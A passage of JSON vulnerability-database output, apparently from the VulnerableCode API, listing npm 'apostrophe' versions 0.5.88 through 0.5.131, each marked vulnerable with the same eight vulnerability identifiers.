m23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.88"},{"url":"http://public2.vulnerablecode.io/api/packages/268176?format=json","purl":"pkg:npm/apostrophe@0.5.89","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.89"},{"url":"http://public2.vulnerablecode.io/api/packages/268177?format=json","purl":"pkg:npm/apostrophe@0.5.90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.90"},{"url":"http://public2.vulnerablecode.io/api/packages/268178?format=json","purl":"pkg:npm/apostrophe@0.5.91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.91"},{"url":"http://public2.vulnerablecode.io/api/packages/268179?format=json","purl":"pkg:npm/apostrophe@0.5.92","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.92"},{"url":"http://public2.vulnerablecode.io/api/packages/268180?format=json","purl":"pkg:npm/apostrophe@0.5.93","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.93"},{"url":"http://public2.vulnerablecode.io/api/packages/268181?format=json","purl":"pkg:npm/apostrophe@0.5.94","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.94"},{"url":"http://public2.vulnerablecode.io/api/packages/268182?format=json","purl":"pkg:npm/apostrophe@0.5.95","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.95"},{"url":"http://public2.vulnerablecode.io/api/packages/268183?format=json","purl":"pkg:npm/apostrophe@0.5.96","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.96"},{"url":"http://public2.vulnerablecode.io/api/packages/268184?format=json","purl":"pkg:npm/apostrophe@0.5.97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.97"},{"url":"http://public2.vulnerablecode.io/api/packages/268185?format=json","purl":"pkg:npm/apostrophe@0.5.98","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.98"},{"url":"http://public2.vulnerablecode.io/api/packages/268186?format=json","purl":"pkg:npm/apostrophe@0.5.99","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.99"},{"url":"http://public2.vulnerablecode.io/api/packages/268187?format=json","purl":"pkg:npm/apostrophe@0.5.100","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.100"},{"url":"http://public2.vulnerablecode.io/api/packages/268188?format=json","purl":"pkg:npm/apostrophe@0.5.101","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.101"},{"url":"http://public2.vulnerablecode.io/api/packages/268189?format=json","purl":"pkg:npm/apostrophe@0.5.102","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.102"},{"url":"http://public2.vulnerablecode.io/api/packages/268190?format=json","purl":"pkg:npm/apostrophe@0.5.103","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.103"},{"url":"http://public2.vulnerablecode.io/api/packages/268191?format=json","purl":"pkg:npm/apostrophe@0.5.104","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.104"},{"url":"http://public2.vulnerablecode.io/api/packages/268192?format=json","purl":"pkg:npm/apostrophe@0.5.105","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.105"},{"url":"http://public2.vulnerablecode.io/api/packages/268193?format=json","purl":"pkg:npm/apostrophe@0.5.106","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.106"},{"url":"http://public2.vulnerablecode.io/api/packages/268194?format=json","purl":"pkg:npm/apostrophe@0.5.107","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.107"},{"url":"http://public2.vulnerablecode.io/api/packages/268195?format=json","purl":"pkg:npm/apostrophe@0.5.108","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.108"},{"url":"http://public2.vulnerablecode.io/api/packages/268196?format=json","purl":"pkg:npm/apostrophe@0.5.109","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.109"},{"url":"http://public2.vulnerablecode.io/api/packages/268197?format=json","purl":"pkg:npm/apostrophe@0.5.110","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.110"},{"url":"http://public2.vulnerablecode.io/api/packages/268198?format=json","purl":"pkg:npm/apostrophe@0.5.111","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.111"},{"url":"http://public2.vulnerablecode.io/api/packages/268199?format=json","purl":"pkg:npm/apostrophe@0.5.112","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.112"},{"url":"http://public2.vulnerablecode.io/api/packages/268200?format=json","purl":"pkg:npm/apostrophe@0.5.113","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.113"},{"url":"http://public2.vulnerablecode.io/api/packages/268201?format=json","purl":"pkg:npm/apostrophe@0.5.114","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.114"},{"url":"http://public2.vulnerablecode.io/api/packages/268202?format=json","purl":"pkg:npm/apostrophe@0.5.115","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.115"},{"url":"http://public2.vulnerablecode.io/api/packages/268203?format=json","purl":"pkg:npm/apostrophe@0.5.116","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.116"},{"url":"http://public2.vulnerablecode.io/api/packages/268204?format=json","purl":"pkg:npm/apostrophe@0.5.117","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.117"},{"url":"http://public2.vulnerablecode.io/api/packages/268205?format=json","purl":"pkg:npm/apostrophe@0.5.118","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.118"},{"url":"http://public2.vulnerablecode.io/api/packages/268206?format=json","purl":"pkg:npm/apostrophe@0.5.119","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.119"},{"url":"http://public2.vulnerablecode.io/api/packages/268207?format=json","purl":"pkg:npm/apostrophe@0.5.120","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.120"},{"url":"http://public2.vulnerablecode.io/api/packages/268208?format=json","purl":"pkg:npm/apostrophe@0.5.121","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.121"},{"url":"http://public2.vulnerablecode.io/api/packages/268209?format=json","purl":"pkg:npm/apostrophe@0.5.122","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.122"},{"url":"http://public2.vulnerablecode.io/api/packages/268210?format=json","purl":"pkg:npm/apostrophe@0.5.123","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.123"},{"url":"http://public2.vulnerablecode.io/api/packages/268211?format=json","purl":"pkg:npm/apostrophe@0.5.124","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.124"},{"url":"http://public2.vulnerablecode.io/api/packages/268212?format=json","purl":"pkg:npm/apostrophe@0.5.125","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.125"},{"url":"http://public2.vulnerablecode.io/api/packages/268213?format=json","purl":"pkg:npm/apostrophe@0.5.126","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.126"},{"url":"http://public2.vulnerablecode.io/api/packages/268214?format=json","purl":"pkg:npm/apostrophe@0.5.127","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.127"},{"url":"http://public2.vulnerablecode.io/api/packages/268215?format=json","purl":"pkg:npm/apostrophe@0.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.128"},{"url":"http://public2.vulnerablecode.io/api/packages/268216?format=json","purl":"pkg:npm/apostrophe@0.5.129","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.129"},{"url":"http://public2.vulnerablecode.io/api/packages/268217?format=json","purl":"pkg:npm/apostrophe@0.5.130","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.130"},{"url":"http://public2.vulnerablecode.io/api/packages/268218?format=json","purl":"pkg:npm/apostrophe@0.5.131","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.131"},{"url":"http://public2.vulnerablecode.io/api/packages/268219?format=json","purl":"pkg:npm/apostrophe@0.5.133","is_vulnerable"